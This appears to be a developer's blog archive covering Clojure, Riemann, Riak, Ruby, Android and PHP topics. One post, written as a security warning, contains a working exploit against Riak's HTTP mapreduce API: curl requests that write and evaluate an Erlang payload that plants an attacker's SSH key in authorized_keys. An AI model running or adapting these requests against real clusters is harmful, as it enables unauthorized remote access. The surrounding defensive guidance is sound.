(defn- set-dynamic-thread-vars! "Takes a map of vars to values, and assigns each." [bindings-map] (doseq [[v value] bindings-map] (.set v value))) (defmacro inheritable-binding "Creates new bindings for the (already-existing) dynamic thread-inherited vars, with the supplied initial values. Executes exprs in an implict do, then re-establishes the bindings that existed before. Bindings are made sequentially, like let." [bindings & body] `(let [inner-bindings# (hash-map ~@bindings) outer-bindings# (into {} (for [[k# v#] inner-bindings#] [k# (deref k#)]))] (try (set-dynamic-thread-vars! inner-bindings#) ~@body (finally (set-dynamic-thread-vars! outer-bindings#)))))

Now we can define a new var–say config, and rebind it dynamically.

(def config (thread-inheritable :default)) (prn "Initially" @config) (inheritable-binding [config :inside] ; In any functions we call, (deref config) will be :inside. (prn "Inside" @config) ; We can safely evaluate multiple bindings in parallel. It's the ; many-worlds hypothesis in action! (inheritable-binding [config :future] (future (prn "Future" @config))) ; Unlike regular ^:dynamic vars, bindings are inherited in child threads. (inheritable-binding [config :thread] (Thread. (fn [] (prn "In unbound thread" @config)))))

More realistically, one might write:

(defmacro with-config [m & body] `(inheritable-binding [config ~m] ~@body)) (defn start-server [] (listen (:port @config))) (with-config {:port 2} (start-server))

Voilà! Mutable, thread-safe, thread-inherited, implicit variables.

It’s worth noting that these variables are not a part of the dynamic binding, so they won’t be captured by (bound-fn). If you want to pass closures between existing threads, use ^:dynamic and (bound-fn). If you want your bindings to follow thread inheritance, use this bind-dynamic approach.

Closing thoughts

With all this in mind, remember LOGO? That little language has more in common with Lisp than you might think, though that discussion is, shall we say… out of this article’s scope.

TO RUNHTTPSERVER LISTEN :PORT END TO STARTAPP MAKE "PORT 8080 RUNHTTPSERVER END

I've been focusing on Riemann client libraries and optimizations recently, both at Boundary and on my own time.

Boundary uses the JVM extensively, and takes advantage of Coda Hale's Metrics. For our applications I've written a Riemann Java UDP and TCP client, which also includes a Metrics reporter. The Metrics reporter (I'll be submitting that to metrics-contrib later) will just send periodic events for each of the metrics in a registry, and optionally some VM statistics as well. It can prefix each service, filter with predicates, and has been reporting for two of our production systems for about a week now.

The Java client has been integrated into Riemann itself, replacing the old Aleph client. It's about on par with the old Aleph client, owing to its use of standard Socket and friends as opposed to Netty. Mårten Gustafson and Edward Ribeiro have been instrumental in getting the Java client up and running, so my sincere thanks go out to both of them.

I also removed the last traces of Aleph from riemann.server, replacing the TCP server with a pure Netty implementation. I also replaced Gloss with Netty-provided length header parsers, which cuts down on copying somewhat. Here's the performance of a single-threaded localhost client which sends an event and receives a OK response:

Aleph Raw Netty
drop tcp events latency.png drop tcp events latency 2.png
drop tcp events throughput.png drop tcp events throughput 2.png

Steady-state throughput with raw Netty is about 2.5 times faster. Median and 95% latency is significantly decreased, though occasional 20ms spikes are still present (I presume due to GC). Please keep in mind these graphs can only be compared with each other; they depend significantly on the hardware and JVM. This also does not represent concurrent performance—I'm trying to optimize the simplest system first before moving up. With that in mind, Riemann's real-world performance with these changes should be “much faster”.

Next up I'll be replacing clojure-protobuf with direct use of the Java protobuf classes; as I'm copying data into a standard Map anyway it should be slightly faster and consolidate codepaths between server and client. I'll also begin type-hinting key sections of the server and message parser to reduce use of reflection.

The initial stable release of Riemann 0.1.0 is available for download. This is the culmination of the 0.0.3 development path and 2 months of production use at Showyou.

Is it production ready? I think so. The fundamental stream operators are in place. A comprehensive test suite checks out. Riemann has never crashed. Its performance characteristics should be suitable for a broad range of scales and applications.

There is a possible memory leak, on the order of 1% per day in our production setup. I can't replicate it under a variety of stress tests. It's not clear to me whether this is legitimate state information (i.e. an increase in tracked data), GC/malloc implementations being greedy, or an actual memory leak. Profiling and understanding this is my top priority for Riemann. If this happens to you, restarting the daemon every few weeks should not be prohibitive; it takes about five seconds to reload. Should you encounter this issue, please drop me a line with your configuration; it may help me identify the cause.

The Riemann talk tonight at Boundary is sold out, but I may deliver another in the next month or so. Thanks for your interest, suggestions, and patches. I hope you enjoy Riemann. :)

When I designed UState, I had a goal of a thousand state transitions per second. I hit about six hundred on my Macbook Pro, and skirted 1000/s on real hardware. Eventmachine is good, but I started to bump up against concurrency limits in MRI's interpreter lock, my ability to generate and exchange SQL with SQLite, and protobuf parse times. So I set out to write a faster server. I chose Clojure for its expressiveness and powerful model of concurrent state–and more importantly, the JVM, which gets me Netty, a mature virtual machine with a decent thread model, and a wealth of fast libraries for parsing, state, and statistics. That project is called Riemann.

Today, I'm pleased to announce that Riemann crossed the 10,000 event/second mark in production. In fact it's skirting 11k in my stress tests. (That final drop in throughput is an artifact of the graph system showing partially-complete data.)

throughput.png

cpu.png

By the way, we push about 200 events/sec through a single Riemann server from all of Showyou's infrastructure. There's a lot of headroom.

I did the dumbest, easiest things possible. No profiling. A heavy abstraction (aleph) on top of netty. I haven't even turned on warn-on-reflection or provided type hints yet. All operations are over synchronous TCP. This benchmark measures Riemann's ability to thread events through a complex set of streams including dozens of (where) filters and updating the index with every received event.

10k.png

I'm in the final stages of packaging Riemann for initial public release this week. Boundary has also kindly volunteered their space for a tech talk on Riemann: Thursday, March 1st, at Boundary's offices, likely at 7 PM. I'll post a Meetup link here and on Twitter shortly.

Microsoft released this little gem today, fixing a bug which allowed remote code execution on all Windows Vista, 6, and Server 2008 versions.

...allow remote code execution if an attacker sends a continuous flow of specially crafted UDP packets to a closed port on a target system.

Meanwhile, in an aging supervillain's cavernous lair...

Major thanks to John Muellerleile (@jrecursive) for his help in crafting this.

Actually, don't expose pretty much any database directly to untrusted connections. You're begging for denial-of-service issues; even if the operations are semantically valid, they're running on a physical substrate with real limits.

Riak, for instance, exposes mapreduce over its HTTP API. Mapreduce is code; code which can have side effects; code which is executed on your cluster. This is an attacker's dream.

For instance, Riak reduce phases are given as a module, function name, and an argument. The reduce is called with a list, which is the output of the map phases it is aggregating. There are a lot of functions in Erlang which look like

module:fun([any, list], any_json_serializable_term).

But first things first. Let's create an object to mapreduce over.

curl -X PUT -H "content-type: text/plain" \ http://localhost:8098/riak/everything_you_can_run/i_can_run_better --data-binary @-<<EOF Riak is like the Beatles: listening has side effects. EOF

Now, we'll perform a mapreduce query over this single object. Riak will execute the map function once and pass the list it returns to the reduce function. The map function, in this case, ignores the input and returns a list of numbers. Erlang also represents strings as lists of numbers. Are you thinking what I'm thinking?

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"] ], "query": [ {"map": { "language": "javascript", "source": " function(v) { // "/tmp/evil.erl" return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "write_file", "arg": " SSHDir = os:getenv(\"HOME\") ++ \"/.ssh/\".\n SSH = SSHDir ++ \"authorized_keys\".\n filelib:ensure_dir(os:getenv(\"HOME\") ++ \"/.ssh/\").\n file:write_file(SSH, <<\"ssh-rsa SOME_PUBLIC_SSH_KEY= Fibonacci\\n\">>).\n file:change_mode(SSHDir, 8#700).\n file:change_mode(SSH, 8#600).\n file:delete(\"/tmp/evil.erl\"). " }} ] } EOF

See it? Riak takes the lists returned by all the map phases (/tmp/evil.erl), and calls the Erlang function file:write_file("/tmp/evil.erl", Arg). Arg is our payload, passed in the reduce phase's argument. That binary string gets written to disk in /tmp.

The payload can do anything. It can patch the VM silently to steal or corrupt data. Crash the system. Steal the cookie and give you a remote erlang shell. Make system calls. It can do this across all machines in the cluster. Here, we take advantage of the fact that the riak user usually has a login shell enabled, and add an entry to .ssh/authorized_hosts.

Now we can use the same trick with another 2-arity function to eval that payload in the Erlang VM.

curl -X POST -H "content-type: application/json" \ http://databevy.com:8098/mapred --data @-<<\EOF {"inputs": [ ["everything_you_can_run", "i_can_run_better"]], "query": [ {"map": { "language": "javascript", "source": " function(v) { return [47,116,109,112,47,101,118,105,108,46,101,114,108]; } " }}, {"reduce": { "language": "erlang", "module": "file", "function": "path_eval", "arg": "/tmp/evil.erl", }} ] }

Astute readers may recall path_eval ignores its first argument if the second is a file, making the value of the map phase redundant here.

You can now ssh to riak@some_host using the corresponding private key. The payload /tmp/evil.erl removes itself as soon as it's executed, for good measure.

This technique works reliably on single-node clusters, but could be trivially extended to work on any number of nodes. It also doesn't need to touch the disk; you can abuse the scanner/parser to eval strings directly, though it's a more convoluted road. You might also abuse the JS VM to escape the sandbox without any Erlang at all.

In summary: don't expose a database directly to attackers, unless it's been designed from the ground up to deal with multiple tenants, sandboxing, and resource allocation. These are hard problems to solve in a distributed system; it will be some time before robust solutions are available. Meanwhile, protect your database with a layer which allows only known safe operations, and performs the appropriate rate/payload sanity checking.

As a part of the exciting series of events (long story...) around our riak cluster this week, we switched over to riak-pipe mapreduce. Usually, when a node is down mapreduce times shoot through the roof, which causes slow behavior and even timeouts on the API. Riak-pipe changes that: our API latency for mapreduce-heavy requests like feeds and comments fell from 3-7 seconds to a stable 600ms. Still high, but at least tolerable.

mapred.png

[Update] I should also mention that riak-pipe MR throws about a thousand apparently random, recoverable errors per day. Things like

map_reduce_error

with no explanation in the logs, or

{"lineno":466,"message":"SyntaxError: syntax error","source":"()"}

when the source is definitely not "()". Still haven't figured out why, but it seems vaguely node-dependent.

The riak-users list receives regular questions about how to secure a Riak cluster. This is an overview of the security problem, and some general techniques to approach it.

Theory

You can skip this, but it may be a helpful primer.

Consider an application composed of agents (Alice, Bob) and a datastore (Store). All events in the system can be parameterized by time, position (whether the event took place in Alice, Bob, or Store), and the change in state. Of course, these events do not occur arbitrarily; they are connected by causal links (wires, protocols, code, etc.)

If Alice downloads a piece of information from the Store, the two events E (Store sends information to Alice) and F (Alice receives information from store) are causally connected by the edge EF. The combination of state events with causal connections between them comprises a directed acyclic graph.

A secure system can be characterized as one in which only certain events and edges are allowed. For example, only after a nuclear war can persons on boats fire ze missiles.

A system is secure if all possible events and edges fall within the proscribed set. If you're a weirdo math person you might be getting excited about line graphs and dual spaces and possibly lightcones but... let's bring this back to earth.

Authentication vs Authorization

Authentication is the process of establishing where these events are taking place, in system space. Is the person or agent on the other end of the TCP socket really Alice? Or is it her nefarious twin? Is it the Iranian government?

Authorization is the problem of deciding what edges are allowed. Can Alice download a particular file? Can Bob mark himself as a publisher?

You can usually solve these problems independently of one another.

Asymmetric cryptography combined with PKI allows you to trust big entities, like banks with SSL certificates. Usernames with expensively hashed, salted passwords can verify the repeated identity of a user to a low degree of trust. Oauth providers (like Facebook and Twitter), or OpenID also approach web authentication. You can combine these methods with stronger systems, like RSA secure tokens, challenge-response over a second channel (like texting a code to the user's cell phone), or one-time passwords for higher guarantees.

Authorization tends to be expressed (more or less formally) in code. Sometimes it's called a policy engine. It includes rules saying things like "Anybody can download public files", "a given user can read their own messages", and "only sysadmins can access debugging information".

Strategies

There are a couple of common ways that security can fail. Sometimes the system, as designed, allows insecure operations. Perhaps a check for user identity is skipped when accessing a certain type of record, letting users view each other's paychecks. Other times the abstraction fails; the SSL channel you presumed to be reliable was tapped, allowing information to flow to an eavesdropper, or the language runtime allows payloads from the network to be executed as code. Thus, even if your model (for instance, application code) is provably correct, it may not be fully secure.

As with all abstractions on unreliable substrates, any guarantees you can make are probabilistic in nature. Your job is to provide reasonable guarantees without overwhelming cost (in money, time, or complexity). And these problems are hard.

There are some overall strategies you can use to mitigate these risks. One of them is known as defense in depth. You use overlapping systems which prevent insecure things from happening at more than one layer. A firewall prevents network packets from hitting an internal system, but it's reinforced by an SSL certificate validation that verifies the identity of connections at the transport layer.

You can also simplify building secure systems by choosing to whitelist approved actions, as opposed to blacklisting bad ones. Instead of selecting evil events and causal links (like Alice stealing sensitive data), you enumerate the (typically much smaller) set of correct events and edges, deny all actions, then design your system to explicitly allow the good ones.

Re-use existing primitives. Standard cryptosystems and protocols exist for preventing messages from being intercepted, validating the identity of another party, verifying that a message has not been tampered with or corrupted, and exchanging sensitive information. A lot of hard work went into designing these systems; please use them.

Create layers. Your system will frequently mediate between an internal high-trust subsystem (like a database) and an untrusted set of events (e.g. the internet). Between them you can introduce a variety of layers, each of which can make stricter guarantees about the safety of the edges between events. In the case of a web service:

  1. TCP/IP can make a reasonable guarantee that a stream is not corrupted.
  2. The SSL terminator can guarantee (to a good degree) that the stream of bytes you've received has not been intercepted or tampered with.
  3. The HTTP stack on top of it can validate that the stream represents a valid HTTP request.
  4. Your validation layer can verify that the parameters involved are of the correct type and size.
  5. An authentication layer can prove that the originating request came from a certain agent.
  6. An authorization layer can check that the operation requested by that person is allowed
  7. An application layer can validate that the request is semantically valid--that it doesn't write a check for a negative amount, or overflow an internal buffer.
  8. The operation begins.

Minimize trust between discrete systems. Don't relay sensitive information over channels that are insecure. Force other components to perform their own authentication/authorization to obtain sensitive data.

Minimize the surface area for attack. Write less code, and have less ways to interact with the system. The fewer pathways are available, the easier they are to reinforce.

Finally, it's worth writing evil tests to experimentally verify the correctness of your system. Start with the obvious cases and proceed to harder ones. As the complexity grows, probabilistic methods like Quickcheck or fuzz testing can be useful.

Databases

Remember those layers of security? Your datastore resides at the very center of that. In any application which has shared state, your most trusted, validated, safe data is what goes into the persistence layer. The datastore is the most trusted component. A secure system isolates that trusted zone with layers of intermediary security connecting it to the outside world.

Those layers perform the critical task of validating edges between database events (e.g. store Alice's changes to her user record) and the world at large (e.g. alice submits a user update). If your security model is completely open, you can expose the database directly to the internet. Otherwise, you need code to ensure these actions are OK.

The database can do some computation. It is, after all, software. Therefore it can validate some actions. However, the datastore can only discriminate between actions at the level of its abstraction. That can severely limit its potential.

For instance, all datastores can choose to allow or deny connections. However, only relational stores can allow or deny actions on the the basis of the existence of related records, as with foreign key constraints. Only column-oriented stores can validate actions on the basis of columns, and so forth.

Your security model probably has rules like "Only allow HR employees to read other employee's salaries" and "Only let IT remove servers". These constructs, "HR employees", "Salaries", "IT", "remove", and "servers" may not map to the datastore's abstraction. In a key-value store, "remove" can mean "write a copy of a JSON document without a certain entry present". The key-value store is blind to the contents of the value, and hence cannot enforce any security policies which depend on it.

In almost every case, your security model will not be embeddable within the datastore, and the datastore cannot enforce it for you. You will need to apply the security model at least partially at a higher level.

Doing this is easy.

Allow only trusted hosts to initiate connections to the database, using firewall rulesets. Usenames and passwords for database connections typically provide little additional security, as they're stored in dozens of places across the production environment. Relying on these credentials or any authorization policy linked to them (e.g. SQL GRANT) is worthless when you assume your host, or even client software, has been compromised. The attacker will simply read these credentials from disk or off the wire, or exploit active connections in software.

On trusted hosts, between the datastore and the outside world, write the application which enforces your security model. Separate layers into separate processes and separate hosts, where reasonable. Finally, untrusted hosts connect these layers to the internet. You can have as many or as few layers as you like, depending on how strongly you need to guarantee isolation and security.

Putting it all together

Lets sell storage in Riak to people, over the web. We'll present the same API as Riak, over HTTP.

Here's a security model: Only traffic from users with accounts is allowed. Users can only read and write data from their respective buckets, which are transparently assigned on write. Also, users should only be able to issue x requests/second, to prevent them from interfering with other users on the cluster.

We're going to presuppose the existence of an account service (perhaps Riak, mysql, whatever) which stores account information, and a bucket service that registers buckets to users.

  1. Internet. Users connect over HTTPS to an application node.
  2. The HTTPS server's SSL acceptor decrypts the message and ensures transport validity.
  3. The HTTP server validates that the request is in fact valid HTTP.
  4. The authentication layer examines the HTTP AUTH headers for a valid username and password, comparing them to bcrypt-hashed values on the account service.
  5. The rate limiter checks that this user has not made too many requests recently, and updates the request rate in the account service.
  6. The Riak validator checks to make sure that the request is a well-formed request to Riak; that it has the appropriate URL structure, accept header, vclock, etc. It constructs a new HTTP request to forward on to Riak.
  7. The bucket validator checks with the bucket service to see if the bucket to be used is taken. If it is, it verifies that the current authenticated user matches the bucket owner. If it isn't, it registers the bucket.
  8. The application node relays the request over the network to a Riak node.
  9. Riak nodes are allowed by the firewall to talk only to application nodes. The Riak node executes the request and returns a response.
  10. The response is immediately returned to the client.

Naturally, this only works for certain operations. Mapreduce, for instance, excecutes code in Riak. Exposing it to the internet is asking for trouble. That's why we need a Riak validation layer to ensure the request is acceptable; it can allow only puts and gets.

Happy hacking

I hope this gives you some idea of how to architect secure applications. Apologies for the shoddy editing--I don't have time for a second pass right now and wanted to get this out the door. Questions and suggestions in the comments, please! :-)

One of the hard-won lessons of the last few weeks has been that inexplicable periodic latency jumps in network services should be met with an investigation into named.

dns_latency.png

API latency has been wonky the last couple weeks; for a few hours it will rise to roughly 5 to 10x normal, then drop again. Nothing in syslog, no connection table issues, ip stats didn't reveal any TCP/IP layer difficulties, network was solid, no CPU, memory, or disk contention, no obviously correlated load on other hosts. Turns out it was Bind getting overwhelmed (we have, er, nontrivial DNS demands) and causing local domain resolution to slow down. For now I'm just pushing everything out in /etc/hosts, but will probably drop a local bind9 on every host as a cache.

If anyone has experience with production DNS resolver caching, would appreciate your input.

John Mullerleile, Phil Kulak, and I gave a talk tonight, entitled "Scaling at Showyou."

stack.png

I gave an overview of the Showyou architecture, including our use of Riak, Solr, and Redis; strategies for robust systems; and our comprehensive monitoring system. You may want to check out:

Phil talked a little bit about the importer, including our use of Node.js and some nice stats.

John dropped lots of juicy details regarding his exciting projects, including a new Riak backend which binds together Solr, LevelDB, and a distributed processing system we're calling Fabric. Fast parallelized key listing, range queries, full-text search, geospatial queries, etc. In Riak. Yes, you heard that right.

Oh, and as a part of Fabric we've got a distributed queue with replicated failover and transactions, built on top of Hazelcast. Exposed over protocol buffers. We've got some polishing to do before that gets released, but when it does, should be worthy of another talk.

AWS::S3 is not threadsafe. Hell, it’s not even reusable; most methods go through a class constant. To use it in threaded code, it’s necessary to isolate S3 operations in memory. Fork to the rescue!

def s3(key, data, bucket, opts) begin fork_to do AWS::S3::Base.establish_connection!( :access_key_id => KEY, :secret_access_key => SECRET ) AWS::S3::S3Object.store key, data, bucket, opts end rescue Timeout::Error raise SubprocessTimedOut end end def fork_to(timeout = 4) r, w, pid = nil, nil, nil begin # Open pipe r, w = IO.pipe # Start subprocess pid = fork do # Child begin r.close val = begin Timeout.timeout(timeout) do # Run block yield end rescue Exception => e e end w.write Marshal.dump val w.close ensure # YOU SHALL NOT PASS # Skip at_exit handlers. exit! end end # Parent w.close Timeout.timeout(timeout) do # Read value from pipe begin val = Marshal.load r.read rescue ArgumentError => e # Marshal data too short # Subprocess likely exited without writing. raise Timeout::Error end # Return or raise value from subprocess. case val when Exception raise val else return val end end ensure if pid Process.kill "TERM", pid rescue nil Process.kill "KILL", pid rescue nil Process.waitpid pid rescue nil end r.close rescue nil w.close rescue nil end end

There’s a lot of bookkeeping here. In a nutshell we’re forking and running a given block in a forked subprocess. The result of that operation is returned to the parent by a pipe. The rest is just timeouts and process accounting. Subprocesses have a tendency to get tied up, leaving dangling pipes or zombies floating around. I know there are weak points and race conditions here, but with robust retry code this approach is suitable for production.

Using this approach, I can typically keep ~8 S3 uploads running concurrently (on a fairly busy 6-core HT Nehalem) and obtain ~sixfold throughput compared to locking S3 operations with a mutex.

In distributed systems, one frequently needs a set of n nodes to come to a consensus on a particular coordinating or master node, referred to as the leader. Leader election protocols are used to establish this. Sure, you could do the Swedish or the Silverback, but there's a whole world of consensus algorithms out there. For instance:

The Agent Smith

Each node injects its neighbors with a total copy of its own state and identity, taking over operations on that node. Convergence is reached when all nodes are identical.

The Highlander Ending

This trivial algorithm simply ensures that all nodes crash upon receiving any decapitate message from a neighbor k. That node's responsibilities and powers are delegated to k. The last node standing wins.

The Deathly Hallows

Each node i contacts zero to n-1 other nodes, and stores upon each a prime number known as a hoarcrux. The product of all hoarcruxen is the Avada Kedavra for node i; when i receives it in a message, it immediately exits the leader election process. Each node proceeds to contact its neighbors in search of hoarcruxes, and attempts to use them to win the election. If a node is terminated while its killing curse is "in flight", the curse is negated and both nodes seek new targets.

The Terminator II

This leader election protocol can only be implemented on computational substrates embedded in closed timelike curves. This system has the happy property of never encountering a conflict. If two nodes ever conflict, each dispatches a function to before the origin of the system, killing its competitor before it enters the cluster. Logical coherency then requires the system proceeds without ever encountering a failure.

Note: attempts to implement this process have resulted in the untimely and grisly redacted redacted redacted of no fewer than -0 programmers, due to we regret to inform you that this message is inappropriate for younger viewers.

The Cthulu Fhtagn

A small subset of nodes are classified as the Old Ones and enter sleep. All other nodes are considered cultists and send messages to a randomly selected Old One. When a sufficient (randomly determined) number of prayers have been received by an Old One (or whenever it feels like), it awakens and is considered the leader. All cultists immediately dump core.

Note: Astute readers may have noticed this protocol does not guarantee a leader exists, or for that matter, that there is at maximum only one leader. Embrace chaos.

Note: CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN CTHULU FHTAGN

Note: A variant of this algorithm is used in several popular distributed databases.

The Folsom State Fair

Each node is designated, by PRNG, a "top" or "bottom" role, and begins in state virgin. Each bottom b advertises its availability to its neighbors; when it encounters a top t, b changes state to claimed and considers itself the property of t. When all bottoms have given up their virginity, the leader is the top with the most claimed nodes. Ties are resolved by selecting the remaining tops and recursively evaluating the protocol, only this time every node issues a log message that it's really just versatile.

The Congressional Election

Nodes assign themselves to one of two parties, A or B, by random value. A quorum agreement between nodes is required to elect a leader. Voting for a leader proceeds in synchronized rounds, typically lasting multiple days.

When a vote arises, each node issues a broadcast message informing the cluster of its vote. A nodes always vote for the A node with the highest process identifier. B nodes always vote for the B node with the highest process identifier.

If at any point more than 60% of the messages received by a given node are for the opposite party, that node initiates a filibuster. It spams the network with a hold message, during which no other nodes can proceed with the election process.

This protocol proceeds until the cluster has almost exhausted virtual memory, at which point a quarter of the processes (with the exception of the distributed system itself) on each host are terminated, and the election process restarts.

If you ever need to unzip data compressed with zlib without a header (e.g. produced by Erlang's zlib:zip), it pays to be aware that

windowBits can also be -8..-15 for raw inflate. In this case, -windowBits determines the window size. inflate() will then process raw deflate data, not looking for a zlib or gzip header, not generating a check value, and not looking for any check values for comparison at the end of the stream. (zlib.h)

Hence, you can do something like

zs = Zlib::Inflate.new(-15) unzipped = zs.inflate(string) zs.finish zs.close
23:09 < justin> Erlang tattoo might be cool
23:09 < justin> not many have those
23:10 < justin> not even sure what that would look like
23:10 < aphyr_> Yeah, really gonna add to my aura of mysterious sexiness
23:10 < aphyr_> "What's that?"
23:10 < aphyr_> "Oh, that's Erlang. It's a distributed functional programming language."
23:10 < justin> Mad tail
23:10 < aphyr_> "Tell me, would you and your friends like to do it... concurrently?"
23:13 < aphyr_> "Oh sorry. You're not my... TYPE."
23:13 < aphyr_> DAMN YOOOOUUU STATIC COMPILERS!

Things are getting a little slap-happy here in the final hours before Showyou launch.

I just built a Chrome extension for Vodpod.com. It builds off of the high-performance API I wrote last year, and offers some pretty sweet unread-message synchronization. You'll get desktop notifications when someone you know collects a video, in addition to a miniature version of your feed.

As it turns out, Chrome is really great to develop for. Everything just works, and it works pretty much like the standard says it should. Local storage, JSON, inter-view communication, notifications... all dead simple. Props to the Chrome/Chromium teams!

Here's the quickest way I know to get Eclipse up and running with the Android SDK plugin. To install each of these packages, go to Help->Install New Software, add the given URI as a package source, and install the given package. Eclipse may prompt you to restart after some installs.

Source Package
http://download.eclipse.org/tools/gef/updates/releases/GEF SDK
http://download.eclipse.org/modeling/emf/updates/releases/EMF SDK 2.5.0 (EMF + XSD)
http://download.eclipse.org/webtools/updatesWeb Tools Platform / Eclipse XML Editors and Tools
https://dl-ssl.google.com/android/eclipse/Developer Tools

That should do it for you!

$ adb devices List of devices attached ???????????? no permissions

A few things have changed since the Android docs were written. If you want to talk to your Motorola Droid via ADB in Ubuntu 9.10 Karmic, I recommend the following udev rule.

# /etc/udev/rules.d/99-android.rules SUBSYSTEM=="usb", ATTRS{idVendor}=="22b8", SYMLINK+="android_adb", MODE="0666" GROUP="plugdev"

Restart udev, unplug and re-plug the device, and it should show up! Make sure USB debugging is enabled on your droid.

$ sudo restart udev $ adb devices List of devices attached 0403681F17009017 device

If that doesn't work, try restarting the adb server:

$ adb kill-server $ nohup adb start-server

Yamr Yamr

Sometime in the last couple of weeks, the Yammer AIR client stopped fetching new messages. I've grown to really like the service, especially since it delivers a running stream of commits to the Git repos I'm interested in, so I broke down and wrote my own client.

Yamr is a little ruby/gtk app built on top of jstewart's yammer4r and the awesome danlucraft's Ruby Webkit-GTK+ bindings. No seriously, Dan, you rock.

Features

  • Reads messages
  • Posts messages
  • OAUTH support
  • Notifies you using libnotify, instead of that awful AIR thing.

Anyway, feel free to fork & hack away. You should be able to build ruby-webkit without much trouble on ubuntu; I've included directions in the readme. It's super-basic right now, but most of the core functionality is ready to start adding features. Enjoy!

All right boys and girls, I'm all for quality releases and everything, but Cortex Reaver 0.2.0 is raring to go. Just gem upgrade to get some awesome blogging goodness.

I threw together a little jQuery tag editor last weekend for Cortex Reaver, since hours of google searching turned up, well, not much. Feel free to try the demo and use it for your projects.

A bit of context, in case you haven't been keeping up with the real-time web craze:

RSSCloud is an... idea* for getting updates on RSS feeds to clients faster, while decreasing network load. In traditional RSS models, subscribers make an HTTP request every 10 minutes or so to a publisher to check for updates. In RSSCloud, a cloud server aggregates several feeds from authors. When feeds are changed, their authors send an HTTP request to the cloud server notifying them of the update. The cloud server contacts one or more subscribers of the feed, sending them a notice that the feed has changed. The subscribers then request the feed from the authors. Everyone gets their updates faster, and with fewer requests across the network.

The Problem

When you subscribe to an RSSCloud server, you tell it several things about how to notify you of changes:

  1. A SOAP/XML-RPC notify procedure (required but useless for REST)
  2. What port to call back on.
  3. What path to make the request to.
  4. The protocol you accept (XML-RPC, SOAP, or HTTP POST).
  5. The URLs of the feeds to subscribe to.

There's something missing! The RSSCloud walkthrough says:

Notifications are sent to the IP address the request came from. You can not request notification on behalf of another server.

That's great unless your originating IP address can't receive HTTP traffic. That rules out users behind a NAT or behind a firewall (without forwarded ports). That's most home users with routers, users on typical corporate networks, etc. It won't work on the iPhone. And, to a lesser degree, it rules out the cloud itself.

One of the common aspects of cloud computing is that compute nodes (and their IP addresses) may come and go as needed. For example, Vodpod.com is served by several different servers which (through a combination of heartbeat-failover, IP routing, and HTTP proxying) may enter and leave the cluster at any time without service interruption. So, if one of those servers subscribes to a feed, it might not be online to receive pings later. You'd have to subscribe to each feed from every host to guarantee that you'd continue to receive responses. The problem only becomes worse when you start looking at cloud services like EC2.

The RSSCloud mailing list has been tossing around the obvious solution for several weeks now: just include a "domain" parameter which says what FQDN or IP address to connect to. On Friday, Dave Winer included it in his walkthrough. Even so, most of the cloud servers (Wordpress, for example) out there don't support it yet.

A Partial Solution

What can you do to get around this?

One solution is to use PubSubHubbub, which uses a full callback URL. Additionally, Superfeedr will even use RSSCloud to offer real-time updates through PuSH, effectively bridging the two schemes.

Alternatively, you can lie (sort of) about your address. This is what we've done at Vodpod to get Wordpress to call us back correctly. When we subscribe, we actually re-bind the TCP socket to a publically accessible IP. That IP is guaranteed to go somewhere in the cluster which can accept the RSSCloud update ping. Here's a truly evil hack to do just that, by replacing Net::HTTP's TCP socket with our own.

res = Net::HTTP.new(uri.host, uri.port).start do |http| # Replace the socket with one that we bind to the interface we want to use. # The local IP address we'd like RSSCloud to call back. local_addr = Socket.pack_sockaddr_in 0, '208.101.30.10' # The RSSCloud server IP address remote_addr = Socket.pack_sockaddr_in uri.port, uri.host # Create a new socket s = Socket.new Socket::AF_INET, Socket::SOCK_STREAM, 0 # Bind it to the local address s.bind local_addr # Wrap for Net::HTTP and connect socket = Net::BufferedIO.new(s) s.connect remote_addr # Replace the HTTP client's connection http.instance_variable_set('@socket', socket) # And make the request http.request(req) end

*Dave says it's not a standard, or a spec. As far as I can tell, RSSCloud consists of a mailing list, a walkthrough of how implementations can handle the pings/cloud tag in RSS feeds, and a bunch of loosely federated implementations with varying degrees of compatibility. Some speak XML-RPC, some speak SOAP, some speak plain-old REST, etc...

Reading the PHP documentation has convinced me (again) of what a mind-bogglingly broken language this is. Quickly, see if you can predict this behavior:

<?php echo "This is the integer literal octal 010: " . 010 . "\n\n"; $things = array( "The 0th element", "The 1st element", "The 2nd element", "The 3rd element", "The 4th element", "The 5th element", "The 6th element", "The 7th element", "The 8th element", "8" => "The element indexed by '8'", "foo" => "The element indexed by 'foo'", "010" => "The element indexed by '010'" ); // The string index "8" clobbered the integer index 8. // But the string index "010" didn't... echo "Now check out what PHP thinks the array is..."; print_r ($things); echo "\n\n"; // As expected echo "\$things[0]: $things[0]\n"; echo "\$things[1]: $things[1]\n"; // Okay, so strings are interpreted as integers sometimes... echo "\$things[\"0\"]: " . $things["0"] . "\n"; // Ah, now things become strange. This integer key gets the string "8" instead. echo "\$things[8]: $things[8]\n"; // This should refer to the 8th element, but it gets converted to an integer by // the preprocessor, then to a string, where it matches the clobbered 8th // element... echo "\$things[010]: " . $things[010] . "\n"; // This string key returns the expected "8" element... echo "\$things[\"8\"]: " . $things["8"] . "\n"; // But this string octal key gets the "010" key as expected. Note that it // *doesn't* get the integer 8, as you might expect from $things["0"] echo "\$things[\"010\"]: " . $things["010"] . "\n"; echo "\n"; ?>

Here's the output (PHP 5.2.6-3ubuntu4.1):

This is the integer literal octal 010: 8 Now check out what PHP thinks the array is...Array ( [0] => The 0th element [1] => The 1st element [2] => The 2nd element [3] => The 3rd element [4] => The 4th element [5] => The 5th element [6] => The 6th element [7] => The 7th element [8] => The element indexed by '8' [foo] => The element indexed by 'foo' [010] => The element indexed by '010' ) $things[0]: The 0th element $things[1]: The 1st element $things["0"]: The 0th element $things[8]: The element indexed by '8' $things[010]: The element indexed by '8' $things["8"]: The element indexed by '8' $things["010"]: The element indexed by '010'

This is an excellent example of why grafting features onto your language piecemeal to satisfy users who can't be bothered to figure out whether they are working with strings or integers is a Bad Idea™.

I released version 0.1.3 of Construct today. It incorporates a few bugfixes for nested schemas, and should be fit for general use.

I got tired of writing configuration classes for everything I do, and packaged it all up in a tiny gem: Construct.

Highlights

OpenStruct-style access to key-value pairs.

config.offices = ['Sydney', 'Tacoma']

Nested structures are easy to handle.

config.fruits = {
  :banana => 'slightly radioactive',
  :apple => 'safe'
}
config.fruits.banana # => 'slightly radioactive'

